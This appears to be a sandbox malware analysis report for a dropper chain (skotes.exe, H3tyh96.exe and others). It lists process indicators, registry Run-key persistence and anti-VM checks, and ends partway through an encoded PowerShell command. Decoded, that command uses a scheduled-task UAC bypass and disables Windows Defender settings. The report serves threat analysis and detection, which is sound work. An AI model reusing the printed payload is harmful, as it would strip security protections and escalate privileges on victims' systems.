Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	1448	whoami.exe
Token: SeDebugPrivilege	4408	HyperServerFontdll.exe
Token: SeDebugPrivilege	3464	taskkill.exe
Token: SeDebugPrivilege	2560	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	4144	taskkill.exe
Token: SeDebugPrivilege	3412	taskkill.exe
Token: SeDebugPrivilege	3556	firefox.exe
Token: SeDebugPrivilege	3556	firefox.exe
Token: SeDebugPrivilege	5140	dllhost.exe
Token: SeDebugPrivilege	5916	a2c29246b7.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
3184	1E05b7.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe
3200	0d6f1088ef.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4664	H3tyh96.exe
3556	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 3616	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	83
PID 4948 wrote to memory of 3616	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	83
PID 4948 wrote to memory of 3616	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	83
PID 3616 wrote to memory of 3968	3616	p4Y09.exe	84
PID 3616 wrote to memory of 3968	3616	p4Y09.exe	84
PID 3616 wrote to memory of 3968	3616	p4Y09.exe	84
PID 3968 wrote to memory of 3184	3968	L9O32.exe	85
PID 3968 wrote to memory of 3184	3968	L9O32.exe	85
PID 3968 wrote to memory of 3184	3968	L9O32.exe	85
PID 3184 wrote to memory of 1444	3184	1E05b7.exe	86
PID 3184 wrote to memory of 1444	3184	1E05b7.exe	86
PID 3184 wrote to memory of 1444	3184	1E05b7.exe	86
PID 3968 wrote to memory of 2840	3968	L9O32.exe	87
PID 3968 wrote to memory of 2840	3968	L9O32.exe	87
PID 3968 wrote to memory of 2840	3968	L9O32.exe	87
PID 3616 wrote to memory of 4076	3616	p4Y09.exe	89
PID 3616 wrote to memory of 4076	3616	p4Y09.exe	89
PID 3616 wrote to memory of 4076	3616	p4Y09.exe	89
PID 4948 wrote to memory of 2212	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	92
PID 4948 wrote to memory of 2212	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	92
PID 4948 wrote to memory of 2212	4948	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe	92
PID 1444 wrote to memory of 2848	1444	skotes.exe	97
PID 1444 wrote to memory of 2848	1444	skotes.exe	97
PID 1444 wrote to memory of 2848	1444	skotes.exe	97
PID 1444 wrote to memory of 4664	1444	skotes.exe	100
PID 1444 wrote to memory of 4664	1444	skotes.exe	100
PID 1444 wrote to memory of 4664	1444	skotes.exe	100
PID 1444 wrote to memory of 4332	1444	skotes.exe	107
PID 1444 wrote to memory of 4332	1444	skotes.exe	107
PID 1444 wrote to memory of 4332	1444	skotes.exe	107
PID 1444 wrote to memory of 4448	1444	skotes.exe	109
PID 1444 wrote to memory of 4448	1444	skotes.exe	109
PID 1444 wrote to memory of 4448	1444	skotes.exe	109
PID 4664 wrote to memory of 4732	4664	H3tyh96.exe	110
PID 4664 wrote to memory of 4732	4664	H3tyh96.exe	110
PID 4664 wrote to memory of 4732	4664	H3tyh96.exe	110
PID 4448 wrote to memory of 4932	4448	UkYEOVR.exe	112
PID 4448 wrote to memory of 4932	4448	UkYEOVR.exe	112
PID 4448 wrote to memory of 4932	4448	UkYEOVR.exe	112
PID 4732 wrote to memory of 4892	4732	powershell.exe	117
PID 4732 wrote to memory of 4892	4732	powershell.exe	117
PID 4732 wrote to memory of 4892	4732	powershell.exe	117
PID 1444 wrote to memory of 4700	1444	skotes.exe	118
PID 1444 wrote to memory of 4700	1444	skotes.exe	118
PID 1444 wrote to memory of 4700	1444	skotes.exe	118
PID 4732 wrote to memory of 4040	4732	powershell.exe	119
PID 4732 wrote to memory of 4040	4732	powershell.exe	119
PID 4732 wrote to memory of 4040	4732	powershell.exe	119
PID 4732 wrote to memory of 1728	4732	powershell.exe	121
PID 4732 wrote to memory of 1728	4732	powershell.exe	121
PID 4732 wrote to memory of 1728	4732	powershell.exe	121
PID 4732 wrote to memory of 324	4732	powershell.exe	123
PID 4732 wrote to memory of 324	4732	powershell.exe	123
PID 4732 wrote to memory of 324	4732	powershell.exe	123
PID 4732 wrote to memory of 752	4732	powershell.exe	124
PID 4732 wrote to memory of 752	4732	powershell.exe	124
PID 4732 wrote to memory of 752	4732	powershell.exe	124
PID 752 wrote to memory of 3200	752	powershell.exe	126
PID 752 wrote to memory of 3200	752	powershell.exe	126
PID 752 wrote to memory of 3200	752	powershell.exe	126
PID 752 wrote to memory of 3508	752	powershell.exe	128
PID 752 wrote to memory of 3508	752	powershell.exe	128
PID 752 wrote to memory of 3508	752	powershell.exe	128
PID 752 wrote to memory of 1448	752	powershell.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
"C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3184
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1444
      - C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2848
      - C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4Ac